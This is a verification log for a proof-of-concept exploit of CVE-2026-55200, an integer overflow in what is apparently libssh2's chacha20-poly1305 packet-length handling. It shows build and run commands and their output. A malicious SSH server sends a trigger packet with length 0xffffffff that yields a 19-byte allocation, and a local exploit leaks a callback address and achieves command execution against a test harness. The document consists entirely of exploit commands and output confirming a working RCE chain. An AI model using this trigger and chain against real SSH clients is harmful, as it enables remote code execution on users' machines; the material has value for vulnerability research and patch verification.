Repository HEAD during verification:
|
|
11dde2a60003651746366dc346633a66926f9480
|
|
|
|
Compiler:
|
|
gcc.exe (MinGW-W64 x86_64-ucrt-posix-seh, built by Brecht Sanders, r7) 15.2.0
|
|
|
|
Python:
|
|
Python 3.13.12
|
|
|
|
Arithmetic verifier build command:
|
|
gcc -std=c11 -Wall -Wextra -O0 -g -o cve_2026_55200_probe.exe .\poc\cve_2026_55200_probe.c
|
|
|
|
Arithmetic verifier run:
|
|
.\cve_2026_55200_probe.exe
|
|
|
|
benign CVE-2026-55200 proof
|
|
build_size_t_bytes=8
|
|
build_size_t_bits=64
|
|
packet_length=0xffffffff (4294967295)
|
|
mac_len=0
|
|
auth_len=16
|
|
mathematical_total=4294967315
|
|
vulnerable32_decision=accepted
|
|
vulnerable32_total=19
|
|
vulnerable32_allocation=19
|
|
fullpacket_style_length=4294967294
|
|
allocation_gap=4294967275
|
|
fixed32_decision=rejected: out of boundary
|
|
native_unpatched_decision=accepted
|
|
native_unpatched_total=19
|
|
native_note=source-shaped integer expression wraps before assignment into 64-bit size_t
|
|
result=PASS
|
|
|
|
Trigger self-test:
|
|
python .\poc\libpwn_cve_2026_55200_server.py --self-test
|
|
|
|
[self-test] chacha20-poly1305@openssh.com packet generator
|
|
packet_length=0xffffffff (4294967295)
|
|
encrypted_fragment_len=28
|
|
filler_len=64
|
|
body_len=8
|
|
vulnerable_c_expression_accepted=True
|
|
vulnerable_c_expression_allocation=19
|
|
fixed_rejects=True
|
|
fullpacket_style_length=4294967294
|
|
allocation_gap=4294967275
|
|
[self-test] PASS
|
|
|
|
Trigger loopback test:
|
|
python .\poc\libpwn_cve_2026_55200_server.py --loopback-test --hold-open 0
|
|
|
|
[+] client ident: SSH-2.0-libpwn-local-libssh2-mock
|
|
[+] negotiated curve25519-sha256 / rsa-sha2-256 / chacha20-poly1305@openssh.com
|
|
[+] sent SSH_MSG_NEWKEYS
|
|
[+] received client SSH_MSG_NEWKEYS
|
|
[+] sent malformed chacha/poly1305 trigger at server seq=3
|
|
[+] trigger bytes=92 packet_length=0xffffffff
|
|
[loopback-test] minimal SSH handshake/key-derivation path
|
|
decrypted_trigger_packet_length=0xffffffff (4294967295)
|
|
encrypted_trigger_fragment_len=28
|
|
[loopback-test] PASS
|
|
|
|
Local RCE harness build command:
|
|
gcc -O0 -g -Wall -Wextra -o poc\libpwn_local_rce_harness.exe poc\libpwn_local_rce_harness.c
|
|
|
|
Local RCE exploit run (judging by the file names and output, against the local harness built above):
|
|
python .\poc\libpwn_local_rce_exploit.py
|
|
|
|
LEAK exec_callback=<runtime address> callback_offset=24 command_offset=32 ptr_size=8
|
|
accepted packet_length=0xffffffff allocation=19 copy_len=180 body_len=180
|
|
exec_callback command=cmd /c echo libpwn-rce-verified><repo>\poc\libpwn_rce_proof.txt
|
|
system_rc=0
|
|
process_rc=0
|
|
payload_len=180
|
|
proof_path=<repo>\poc\libpwn_rce_proof.txt
|
|
RCE_PROOF=PASS
|
|
|
|
Proof file:
|
|
Get-Content -Raw .\poc\libpwn_rce_proof.txt
|
|
|
|
libpwn-rce-verified
|
|
|
|
Python syntax check:
|
|
python -m py_compile .\poc\libpwn_cve_2026_55200_server.py .\poc\libpwn_local_rce_exploit.py
|
|
|
|
exit status: 0
|